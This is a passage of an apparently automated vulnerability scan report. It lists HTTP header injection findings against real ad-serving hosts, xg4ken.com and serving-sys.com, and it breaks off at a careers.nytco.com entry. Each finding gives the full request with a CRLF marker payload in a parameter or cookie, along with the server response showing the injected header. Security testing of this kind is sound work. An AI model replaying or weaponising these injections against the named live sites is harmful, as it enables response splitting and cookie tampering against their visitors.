Referer: http://googleads.g.vulnerable.ad.partner/pagead/ads?client=ca-nytimes_topic_var&output=js&lmt=1289612644&num_ads=3&channel=null%20Times_Topics&ea=0&oe=utf8&flash=10.1.102.64&url=http%3A%2F%2Ftopics.nytimes.com%2Ftopics%2Freference%2Ftimestopics%2Findex.html%3Fsrc%3Dhp1-0-T&adsafe=high&dt=1289612644699&shv=r20101104&jsv=r20101102&prev_fmts=728x90_pas_abgc&correlator=1289612638818&frm=0&adk=3911298567&ga_vid=450131239.1289612641&ga_sid=1289612641&ga_hid=1125200407&ga_fc=0&u_tz=-360&u_his=1&u_java=1&u_h=960&u_w=1536&u_ah=925&u_aw=1536&u_cd=16&u_nplug=0&u_nmime=0&biw=985&bih=645&eid=30143102&ref=http%3A%2F%2Fwww.nytimes.com%2F&fu=0&ifi=3&dtd=63

Response

HTTP/1.1 302 Found
Date: Sat, 13 Nov 2010 01:48:15 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Set-Cookie: kenshoo_id=2fb24f52-9cc4-a448-bb6f-0000476b34c3; expires=Fri, 11-Feb-2011 01:48:15 GMT; path=/; domain=.xg4ken.com
Location: http://www.perpetual.com.au/investors.aspx?3ad15
1c8f5fba2b9=1
P3P: policyref="http://www.xg4ken.com/w3c/p3p.xml", CP="ADMa DEVa OUR IND DSP NON LAW"
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8

2.2. http://50.xg4ken.com/media/redir.php [url[] parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://50.xg4ken.com
Path:	/media/redir.php

Issue detail

The value of the url[] request parameter is copied into the Location response header. The payload add4a%0d%0ac9c4539c3b6 was submitted in the url[] parameter. This caused a response containing an injected HTTP header.

Request

GET /media/redir.php?prof=593&camp=15226&affcode=cr5943&cid=6211890421&networkType=content&url[]=http%3A%2F%2Fwww.perpetual.com.au%2Finvestors.aspxadd4a%0d%0ac9c4539c3b6 HTTP/1.1
Host: 50.xg4ken.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://googleads.g.vulnerable.ad.partner/pagead/ads?client=ca-nytimes_topic_var&output=js&lmt=1289612644&num_ads=3&channel=null%20Times_Topics&ea=0&oe=utf8&flash=10.1.102.64&url=http%3A%2F%2Ftopics.nytimes.com%2Ftopics%2Freference%2Ftimestopics%2Findex.html%3Fsrc%3Dhp1-0-T&adsafe=high&dt=1289612644699&shv=r20101104&jsv=r20101102&prev_fmts=728x90_pas_abgc&correlator=1289612638818&frm=0&adk=3911298567&ga_vid=450131239.1289612641&ga_sid=1289612641&ga_hid=1125200407&ga_fc=0&u_tz=-360&u_his=1&u_java=1&u_h=960&u_w=1536&u_ah=925&u_aw=1536&u_cd=16&u_nplug=0&u_nmime=0&biw=985&bih=645&eid=30143102&ref=http%3A%2F%2Fwww.nytimes.com%2F&fu=0&ifi=3&dtd=63

Response

HTTP/1.1 302 Found
Date: Sat, 13 Nov 2010 01:48:12 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Set-Cookie: kenshoo_id=69a583c2-bc54-63e9-bbde-000069f3421b; expires=Fri, 11-Feb-2011 01:48:12 GMT; path=/; domain=.xg4ken.com
Location: http://www.perpetual.com.au/investors.aspxadd4a
c9c4539c3b6
P3P: policyref="http://www.xg4ken.com/w3c/p3p.xml", CP="ADMa DEVa OUR IND DSP NON LAW"
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8

2.3. http://bs.serving-sys.com/BurstingPipe/BannerRedirect.asp [eyeblaster cookie] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://bs.serving-sys.com
Path:	/BurstingPipe/BannerRedirect.asp

Issue detail

The value of the eyeblaster cookie is copied into the Set-Cookie response header. The payload fbfaf%0d%0a92218480552 was submitted in the eyeblaster cookie. This caused a response containing an injected HTTP header.

Request

GET /BurstingPipe/BannerRedirect.asp HTTP/1.1
Host: bs.serving-sys.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: U=bc24f152-c049-433d-b700-d0e64725117e3F803g; A2=dQW+9KSp066N0000820wrHewqR9KRX02WG0000a2wErHeT709LaM0a4c0000w820rIfhPu9MHs0bnA0000PcPcrMduic9L7T0a9x0000820wrIeT809L8h0a4c0000g410rI; eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1102&RES=0&WMPV=0fbfaf%0d%0a92218480552; B2=7hMi0g410rI6Pim0820wrH72wu0a2wErH6EWJ0820wrI7luQ0PcPcrM7hMh0w820rI; u2=bc24f152-c049-433d-b700-d0e64725117e3F803g; E2=066N820wrH0a4cMc30rI0a9x820wrI02WGa2wErH0bnAPcPcrM; C3=0ujua2wErH0000001_0u6FPcPcrM0000040_0nez820wrH000000g_0tdV820wrI0000001_0uXiMc30rI0000002_; u3=1; D3=0tdV01xc820wrI0uju00Z3a2wErH0uXi00Y3Mc30rI0nez002P820wrH0u6F004HPcPcrM;

Response

2.4. http://bs.serving-sys.com/BurstingPipe/BannerSource.asp [Pos parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://bs.serving-sys.com
Path:	/BurstingPipe/BannerSource.asp

Issue detail

The value of the Pos request parameter is copied into the Set-Cookie response header. The payload ff8ba%0d%0a362c533d84b was submitted in the Pos parameter. This caused a response containing an injected HTTP header.

Request

GET /BurstingPipe/BannerSource.asp?FlightID=1922996&Page=&PluID=0&Pos=ff8ba%0d%0a362c533d84b HTTP/1.1
Host: bs.serving-sys.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: U=bc24f152-c049-433d-b700-d0e64725117e3F803g; A2=dQW+9KSp066N0000820wrHewqR9KRX02WG0000a2wErHeT709LaM0a4c0000w820rIfhPu9MHs0bnA0000PcPcrMduic9L7T0a9x0000820wrIeT809L8h0a4c0000g410rI; eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1102&RES=0&WMPV=0; B2=7hMi0g410rI6Pim0820wrH72wu0a2wErH6EWJ0820wrI7luQ0PcPcrM7hMh0w820rI; u2=bc24f152-c049-433d-b700-d0e64725117e3F803g; E2=066N820wrH0a4cMc30rI0a9x820wrI02WGa2wErH0bnAPcPcrM; C3=0ujua2wErH0000001_0u6FPcPcrM0000040_0nez820wrH000000g_0tdV820wrI0000001_0uXiMc30rI0000002_; u3=1; D3=0tdV01xc820wrI0uju00Z3a2wErH0uXi00Y3Mc30rI0nez002P820wrH0u6F004HPcPcrM;

Response

HTTP/1.1 302 Object moved
Connection: close
Date: Sat, 13 Nov 2010 01:59:50 GMT
Server: Microsoft-IIS/6.0
P3P: policyref=http://www.eyeblaster.com/p3p/Eyeblaster-served-p3p2.xml,CP="NOI DEVa OUR BUS UNI"
X-Powered-By: ASP.NET
Content-type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Cache-Control: no-cache, no-store
Pragma: no-cache
Set-Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1102&RES=0&WMPV=0; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=bs.serving-sys.com; path=/
Set-Cookie: A2=eT709LaM0a4c0000w820rIewqR9KRX02WG0000a2wErHdQW+9KSp066N0000820wrHfhPu9MHH0bnA0000PcPcrMduic9L7T0a9x0000820wrIeT809L8h0a4c0000g410rI; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B2=7hMi0g410rI6Pim0820wrH72wu0a2wErH6EWJ0820wrI7luQ0PcPcrM7hMh0w820rI; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: C3=0ujua2wErH0000001_0u6FPcPcrM0000040_0nez820wrH000000g_0tdV820wrI0000001_0uXiMc30rI0000002_; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: D3=0tdV01xc820wrI0uju00Z3a2wErH0uXi00Y3Mc30rI0nez002P820wrH0u6F004HPcPcrM; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: E2=066N820wrH02WGa2wErH0a9x820wrI0a4cMc30rI0bnAPcPcrM; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u2=bc24f152-c049-433d-b700-d0e64725117e3F803g; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u3=1; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: U=bc24f152-c049-433d-b700-d0e64725117e3F803g; expires=Thu, 17-Apr-2010 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: C_ff8ba
362c533d84b=4005086
Location: http://ds.serving-sys.com/BurstingRes/Site-2452/Type-0/10e11342-71de-4dd2-be15-f354433bed69.gif
Content-Length: 0

2.5. http://bs.serving-sys.com/BurstingPipe/BannerSource.asp [eyeblaster cookie] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://bs.serving-sys.com
Path:	/BurstingPipe/BannerSource.asp

Issue detail

The value of the eyeblaster cookie is copied into the Set-Cookie response header. The payload 38356%0d%0a8ef6af01349 was submitted in the eyeblaster cookie. This caused a response containing an injected HTTP header.

Request

GET /BurstingPipe/BannerSource.asp HTTP/1.1
Host: bs.serving-sys.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: U=bc24f152-c049-433d-b700-d0e64725117e3F803g; A2=dQW+9KSp066N0000820wrHewqR9KRX02WG0000a2wErHeT709LaM0a4c0000w820rIfhPu9MHs0bnA0000PcPcrMduic9L7T0a9x0000820wrIeT809L8h0a4c0000g410rI; eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1102&RES=0&WMPV=038356%0d%0a8ef6af01349; B2=7hMi0g410rI6Pim0820wrH72wu0a2wErH6EWJ0820wrI7luQ0PcPcrM7hMh0w820rI; u2=bc24f152-c049-433d-b700-d0e64725117e3F803g; E2=066N820wrH0a4cMc30rI0a9x820wrI02WGa2wErH0bnAPcPcrM; C3=0ujua2wErH0000001_0u6FPcPcrM0000040_0nez820wrH000000g_0tdV820wrI0000001_0uXiMc30rI0000002_; u3=1; D3=0tdV01xc820wrI0uju00Z3a2wErH0uXi00Y3Mc30rI0nez002P820wrH0u6F004HPcPcrM;

Response

2.6. http://bs.serving-sys.com/BurstingPipe/BurstingInteractionsPipe.asp [eyeblaster cookie] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://bs.serving-sys.com
Path:	/BurstingPipe/BurstingInteractionsPipe.asp

Issue detail

The value of the eyeblaster cookie is copied into the Set-Cookie response header. The payload 37f1a%0d%0a2300f10199f was submitted in the eyeblaster cookie. This caused a response containing an injected HTTP header.

Request

GET /BurstingPipe/BurstingInteractionsPipe.asp HTTP/1.1
Host: bs.serving-sys.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: U=bc24f152-c049-433d-b700-d0e64725117e3F803g; A2=dQW+9KSp066N0000820wrHewqR9KRX02WG0000a2wErHeT709LaM0a4c0000w820rIfhPu9MHs0bnA0000PcPcrMduic9L7T0a9x0000820wrIeT809L8h0a4c0000g410rI; eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1102&RES=0&WMPV=037f1a%0d%0a2300f10199f; B2=7hMi0g410rI6Pim0820wrH72wu0a2wErH6EWJ0820wrI7luQ0PcPcrM7hMh0w820rI; u2=bc24f152-c049-433d-b700-d0e64725117e3F803g; E2=066N820wrH0a4cMc30rI0a9x820wrI02WGa2wErH0bnAPcPcrM; C3=0ujua2wErH0000001_0u6FPcPcrM0000040_0nez820wrH000000g_0tdV820wrI0000001_0uXiMc30rI0000002_; u3=1; D3=0tdV01xc820wrI0uju00Z3a2wErH0uXi00Y3Mc30rI0nez002P820wrH0u6F004HPcPcrM;

Response

2.7. http://bs.serving-sys.com/BurstingPipe/BurstingInteractionsPipe.asp [flv parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://bs.serving-sys.com
Path:	/BurstingPipe/BurstingInteractionsPipe.asp

Issue detail

The value of the flv request parameter is copied into the Set-Cookie response header. The payload 3308a%0d%0ab7fc8e58424 was submitted in the flv parameter. This caused a response containing an injected HTTP header.

Request

GET /BurstingPipe/BurstingInteractionsPipe.asp?interactionsStr=4005086%7E%7E0%5EebUniqueDwell%7E0%7E0%7E1%7E0%7E2%7E0%7E0%5EebAboveTheFold%7E0%7E0%7E1%7E0%7E2%7E0%7E0%5EebPanelsViewed%7E0%7E0%7E1%7E0%7E2%7E0%7E0%5EebUserInteraction%7E0%7E0%7E1%7E0%7E2%7E0%7E0&OptOut=0&ebRandom=0.4607956385523753&flv=3308a%0d%0ab7fc8e58424&wmpv=0&res=0 HTTP/1.1
Accept: */*
Referer: http://www.nytimes.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: bs.serving-sys.com
Proxy-Connection: Keep-Alive
Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1102&RES=0&WMPV=0; A2=dQW+9KSp066N0000820wrHewqR9KRX02WG0000a2wErHeT709LaM0a4c0000w820rIfhPu9MHs0bnA0000Mc30rMduic9L7T0a9x0000820wrIeT809L8h0a4c0000g410rI; B2=7hMi0g410rI6Pim0820wrH72wu0a2wErH6EWJ0820wrI7luQ0Mc30rM7hMh0w820rI; C3=0ujua2wErH0000001_0u6FMc30rM0000040_0nez820wrH000000g_0tdV820wrI0000001_0uXiMc30rI0000002_; D3=0tdV01xc820wrI0uju00Z3a2wErH0uXi00Y3Mc30rI0nez002P820wrH0u6F004HMc30rM; E2=066N820wrH0a4cMc30rI0a9x820wrI02WGa2wErH0bnAMc30rM; u2=bc24f152-c049-433d-b700-d0e64725117e3F803g; u3=1

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 0
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
P3P: policyref=http://www.eyeblaster.com/p3p/Eyeblaster-served-p3p2.xml,CP="NOI DEVa OUR BUS UNI"
X-Powered-By: ASP.NET
Set-Cookie: A2=eT709LaM0a4c0000w820rIewqR9KRX02WG0000a2wErHdQW+9KSp066N0000820wrHfhPu9MHs0bnA0000Ncj4rMduic9L7T0a9x0000820wrIeT809L8h0a4c0000g410rI; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B2=7hMi0g410rI6Pim0820wrH72wu0a2wErH6EWJ0820wrI7luQ0Ncj4rM7hMh0w820rI; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: C3=0ujua2wErH0000001_0u6FNcj4rM0000040_0nez820wrH000000g_0tdV820wrI0000001_0uXiMc30rI0000002_; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: D3=0tdV01xc820wrI0uju00Z3a2wErH0uXi00Y3Mc30rI0nez002P820wrH0u6F004HNcj4rM; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: E2=066N820wrH02WGa2wErH0a9x820wrI0a4cMc30rI0bnANcj4rM; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u2=bc24f152-c049-433d-b700-d0e64725117e3F803g; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u3=1; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: U=bc24f152-c049-433d-b700-d0e64725117e3F803g; expires=Thu, 17-Apr-2010 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=3308a
b7fc8e58424&RES=0&WMPV=0; expires=Thu, 31-Dec-2037 22: 00:00 GMT; domain=bs.serving-sys.com; path=/
Connection: close

2.8. http://bs.serving-sys.com/BurstingPipe/BurstingInteractionsPipe.asp [res parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://bs.serving-sys.com
Path:	/BurstingPipe/BurstingInteractionsPipe.asp

Issue detail

The value of the res request parameter is copied into the Set-Cookie response header. The payload 1c571%0d%0ac124ed287af was submitted in the res parameter. This caused a response containing an injected HTTP header.

Request

GET /BurstingPipe/BurstingInteractionsPipe.asp?interactionsStr=4005086%7E%7E0%5EebUniqueDwell%7E0%7E0%7E1%7E0%7E2%7E0%7E0%5EebAboveTheFold%7E0%7E0%7E1%7E0%7E2%7E0%7E0%5EebPanelsViewed%7E0%7E0%7E1%7E0%7E2%7E0%7E0%5EebUserInteraction%7E0%7E0%7E1%7E0%7E2%7E0%7E0&OptOut=0&ebRandom=0.4607956385523753&flv=10.1102&wmpv=0&res=1c571%0d%0ac124ed287af HTTP/1.1
Accept: */*
Referer: http://www.nytimes.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: bs.serving-sys.com
Proxy-Connection: Keep-Alive
Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1102&RES=0&WMPV=0; A2=dQW+9KSp066N0000820wrHewqR9KRX02WG0000a2wErHeT709LaM0a4c0000w820rIfhPu9MHs0bnA0000Mc30rMduic9L7T0a9x0000820wrIeT809L8h0a4c0000g410rI; B2=7hMi0g410rI6Pim0820wrH72wu0a2wErH6EWJ0820wrI7luQ0Mc30rM7hMh0w820rI; C3=0ujua2wErH0000001_0u6FMc30rM0000040_0nez820wrH000000g_0tdV820wrI0000001_0uXiMc30rI0000002_; D3=0tdV01xc820wrI0uju00Z3a2wErH0uXi00Y3Mc30rI0nez002P820wrH0u6F004HMc30rM; E2=066N820wrH0a4cMc30rI0a9x820wrI02WGa2wErH0bnAMc30rM; u2=bc24f152-c049-433d-b700-d0e64725117e3F803g; u3=1

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 0
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
P3P: policyref=http://www.eyeblaster.com/p3p/Eyeblaster-served-p3p2.xml,CP="NOI DEVa OUR BUS UNI"
X-Powered-By: ASP.NET
Set-Cookie: A2=eT709LaM0a4c0000w820rIewqR9KRX02WG0000a2wErHdQW+9KSp066N0000820wrHfhPu9MHs0bnA0000Ncj4rMduic9L7T0a9x0000820wrIeT809L8h0a4c0000g410rI; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B2=7hMi0g410rI6Pim0820wrH72wu0a2wErH6EWJ0820wrI7luQ0Ncj4rM7hMh0w820rI; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: C3=0ujua2wErH0000001_0u6FNcj4rM0000040_0nez820wrH000000g_0tdV820wrI0000001_0uXiMc30rI0000002_; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: D3=0tdV01xc820wrI0uju00Z3a2wErH0uXi00Y3Mc30rI0nez002P820wrH0u6F004HNcj4rM; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: E2=066N820wrH02WGa2wErH0a9x820wrI0a4cMc30rI0bnANcj4rM; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u2=bc24f152-c049-433d-b700-d0e64725117e3F803g; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u3=1; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: U=bc24f152-c049-433d-b700-d0e64725117e3F803g; expires=Thu, 17-Apr-2010 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1102&RES=1c571
c124ed287af&WMPV=0; expires=Thu, 31-Dec-2037 22: 00:00 GMT; domain=bs.serving-sys.com; path=/
Connection: close

2.9. http://bs.serving-sys.com/BurstingPipe/BurstingInteractionsPipe.asp [wmpv parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://bs.serving-sys.com
Path:	/BurstingPipe/BurstingInteractionsPipe.asp

Issue detail

The value of the wmpv request parameter is copied into the Set-Cookie response header. The payload 637d4%0d%0a49ae547a880 was submitted in the wmpv parameter. This caused a response containing an injected HTTP header.

Request

GET /BurstingPipe/BurstingInteractionsPipe.asp?interactionsStr=4005086%7E%7E0%5EebUniqueDwell%7E0%7E0%7E1%7E0%7E2%7E0%7E0%5EebAboveTheFold%7E0%7E0%7E1%7E0%7E2%7E0%7E0%5EebPanelsViewed%7E0%7E0%7E1%7E0%7E2%7E0%7E0%5EebUserInteraction%7E0%7E0%7E1%7E0%7E2%7E0%7E0&OptOut=0&ebRandom=0.4607956385523753&flv=10.1102&wmpv=637d4%0d%0a49ae547a880&res=0 HTTP/1.1
Accept: */*
Referer: http://www.nytimes.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: bs.serving-sys.com
Proxy-Connection: Keep-Alive
Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1102&RES=0&WMPV=0; A2=dQW+9KSp066N0000820wrHewqR9KRX02WG0000a2wErHeT709LaM0a4c0000w820rIfhPu9MHs0bnA0000Mc30rMduic9L7T0a9x0000820wrIeT809L8h0a4c0000g410rI; B2=7hMi0g410rI6Pim0820wrH72wu0a2wErH6EWJ0820wrI7luQ0Mc30rM7hMh0w820rI; C3=0ujua2wErH0000001_0u6FMc30rM0000040_0nez820wrH000000g_0tdV820wrI0000001_0uXiMc30rI0000002_; D3=0tdV01xc820wrI0uju00Z3a2wErH0uXi00Y3Mc30rI0nez002P820wrH0u6F004HMc30rM; E2=066N820wrH0a4cMc30rI0a9x820wrI02WGa2wErH0bnAMc30rM; u2=bc24f152-c049-433d-b700-d0e64725117e3F803g; u3=1

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 0
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
P3P: policyref=http://www.eyeblaster.com/p3p/Eyeblaster-served-p3p2.xml,CP="NOI DEVa OUR BUS UNI"
X-Powered-By: ASP.NET
Set-Cookie: A2=eT709LaM0a4c0000w820rIewqR9KRX02WG0000a2wErHdQW+9KSp066N0000820wrHfhPu9MHs0bnA0000Ncj4rMduic9L7T0a9x0000820wrIeT809L8h0a4c0000g410rI; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B2=7hMi0g410rI6Pim0820wrH72wu0a2wErH6EWJ0820wrI7luQ0Ncj4rM7hMh0w820rI; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: C3=0ujua2wErH0000001_0u6FNcj4rM0000040_0nez820wrH000000g_0tdV820wrI0000001_0uXiMc30rI0000002_; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: D3=0tdV01xc820wrI0uju00Z3a2wErH0uXi00Y3Mc30rI0nez002P820wrH0u6F004HNcj4rM; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: E2=066N820wrH02WGa2wErH0a9x820wrI0a4cMc30rI0bnANcj4rM; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u2=bc24f152-c049-433d-b700-d0e64725117e3F803g; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u3=1; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: U=bc24f152-c049-433d-b700-d0e64725117e3F803g; expires=Thu, 17-Apr-2010 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1102&RES=0&WMPV=637d4
49ae547a880; expires=Thu, 31-Dec-2037 22: 00:00 GMT; domain=bs.serving-sys.com; path=/
Connection: close

2.10. http://bs.serving-sys.com/BurstingPipe/adServer.bs [eyeblaster cookie] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://bs.serving-sys.com
Path:	/BurstingPipe/adServer.bs

Issue detail

The value of the eyeblaster cookie is copied into the Set-Cookie response header. The payload a3baa%0d%0aa106309a0a3 was submitted in the eyeblaster cookie. This caused a response containing an injected HTTP header.

Request

GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=1922996&PluID=0&w=300&h=250&ord=2010.11.13.01.44.23&ucm=true&z=0 HTTP/1.1
Accept: */*
Referer: http://www.nytimes.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: bs.serving-sys.com
Proxy-Connection: Keep-Alive
Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1102&RES=0&WMPV=0a3baa%0d%0aa106309a0a3; A2=eT709LaM0a4c0000w820rIewqR9KRX02WG0000a2wErHdQW+9KSp066N0000820wrHfhPu9MFP0bnA0000Mc30rMduic9L7T0a9x0000820wrIeT809L8h0a4c0000g410rI; B2=7hMi0g410rI6Pim0820wrH72wu0a2wErH6EWJ0820wrI7luQ0Mc30rM7hMh0w820rI; C3=0ujua2wErH0000001_0u6FMc30rM0000040_0nez820wrH000000g_0tdV820wrI0000001_0uXiMc30rI0000002_; D3=0tdV01xc820wrI0uju00Z3a2wErH0uXi00Y3Mc30rI0nez002P820wrH0u6F004HMc30rM; E2=066N820wrH02WGa2wErH0a9x820wrI0a4cMc30rI0bnAMc30rM; u2=bc24f152-c049-433d-b700-d0e64725117e3F803g; u3=1

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Connection: close
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
P3P: policyref=http://www.eyeblaster.com/p3p/Eyeblaster-served-p3p2.xml,CP="NOI DEVa OUR BUS UNI"
X-Powered-By: ASP.NET
Set-Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1102&RES=0&WMPV=0a3baa
a106309a0a3; expires=Thu, 31-Dec-2037 22: 00:00 GMT; domain=bs.serving-sys.com; path=/
Set-Cookie: A2=dQW+9KSp066N0000820wrHewqR9KRX02WG0000a2wErHeT709LaM0a4c0000w820rIfhPu9MHH0bnA0000Mc30rMduic9L7T0a9x0000820wrIeT809L8h0a4c0000g410rI; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B2=7hMi0g410rI6Pim0820wrH72wu0a2wErH6EWJ0820wrI7luQ0Mc30rM7hMh0w820rI; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: C3=0ujua2wErH0000001_0u6FMc30rM0000040_0nez820wrH000000g_0tdV820wrI0000001_0uXiMc30rI0000002_; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: D3=0tdV01xc820wrI0uju00Z3a2wErH0uXi00Y3Mc30rI0nez002P820wrH0u6F004HMc30rM; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: E2=066N820wrH0a4cMc30rI0a9x820wrI02WGa2wErH0bnAMc30rM; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u2=bc24f152-c049-433d-b700-d0e64725117e3F803g; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u3=1; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: U=bc24f152-c049-433d-b700-d0e64725117e3F803g; expires=Thu, 17-Apr-2010 22:00:00 GMT; domain=.serving-sys.com; path=/
Vary: Accept-Encoding
Content-Length: 1912

var ebPtcl="http://";var ebBigS="ds.serving-sys.com/BurstingCachedScripts/";var ebResourcePath="ds.serving-sys.com/BurstingRes//";var ebRand=new String(Math.random());ebRand=ebRand.substr(ebRand.index
...[SNIP]...

2.11. https://careers.nytco.com/psc/TAM/EMPLOYEE/HRMS/c/HRS_HRAM.HRS_CE.GBL [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://careers.nytco.com
